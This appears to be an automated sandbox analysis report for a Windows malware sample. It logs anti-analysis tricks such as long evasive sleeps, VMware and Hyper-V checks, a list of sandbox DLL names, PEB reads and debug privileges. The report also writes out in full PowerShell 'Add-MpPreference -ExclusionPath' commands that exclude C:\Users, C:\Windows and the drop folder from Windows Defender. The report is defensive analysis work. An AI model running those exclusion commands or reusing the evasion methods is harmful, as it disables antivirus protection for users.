Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Binary or memory string: API_LOG.DLL
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr	Binary or memory string: EABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HS%S%SDELAYS.TMPWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION8

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Memory allocated: 2790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Memory allocated: 29B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Memory allocated: 2790000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Window / User API: threadDelayed 775	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Window / User API: threadDelayed 9067	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1068	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 458	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7498	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2182	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1553	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6815	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2907	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1346	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 615	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7908	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1753	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -99812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -99687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -99578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -99469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -99359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -99249s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -99140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -99031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -98922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -98812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -98703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -98593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -98484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -98375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -98265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -98155s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -98047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -97937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -97828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -97719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -97609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -97497s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -97390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -97281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -97172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -97062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -96953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -96844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -96719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -96609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -96500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -96390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -96281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -96172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -96062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -95953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -95844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -95719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -95609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -95500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -95390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -95281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -95172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -95062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -94953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -94843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -94734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -94624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -94515s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5960	Thread sleep count: 1068 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3364	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4832	Thread sleep count: 458 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2328	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6720	Thread sleep count: 7498 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7116	Thread sleep count: 2182 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3672	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5296	Thread sleep count: 1553 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5940	Thread sleep count: 265 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 828	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3500	Thread sleep count: 6815 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3836	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4820	Thread sleep count: 2907 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6012	Thread sleep count: 1346 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6012	Thread sleep count: 615 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4536	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2068	Thread sleep count: 7908 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2068	Thread sleep count: 1753 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5184	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0041E359 FindFirstFileA,FindFirstFileA,	14_2_0041E359
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00420370 FindFirstFileA,FindFirstFileA,	14_2_00420370
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042498B FindFirstFileA,FindFirstFileA,	14_2_0042498B

Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 99812	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 99687	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 99578	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 99469	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 99359	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 99249	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 99140	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 99031	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 98922	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 98812	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 98703	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 98593	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 98484	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 98375	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 98265	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 98155	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 98047	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 97937	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 97828	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 97719	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 97609	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 97497	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 97390	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 97281	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 97172	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 97062	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 96953	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 96844	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 96719	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 96609	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 96500	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 96390	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 96281	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 96172	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 96062	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 95953	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 95844	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 95719	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 95609	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 95500	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 95390	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 95281	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 95172	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 95062	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 94953	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 94843	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 94734	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 94624	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 94515	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: YYjRtxS70h.exe, 00000000.00000002.1785844596.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmp	Binary or memory string: VMwareVMware
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP[
Source: YYjRtxS70h.exe, 00000000.00000002.1799387443.000000000657B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: YYjRtxS70h.exe, 00000000.00000002.1785844596.0000000000C06000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to read the PEB

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040168C mov eax, dword ptr fs:[00000030h]	14_2_0040168C
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004016AA test dword ptr fs:[00000030h], 00000068h	14_2_004016AA
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004016BB mov eax, dword ptr fs:[00000030h]	14_2_004016BB

Enables debug privileges

Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\YYjRtxS70h.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe "C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Queries volume information: C:\Users\user\Desktop\YYjRtxS70h.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
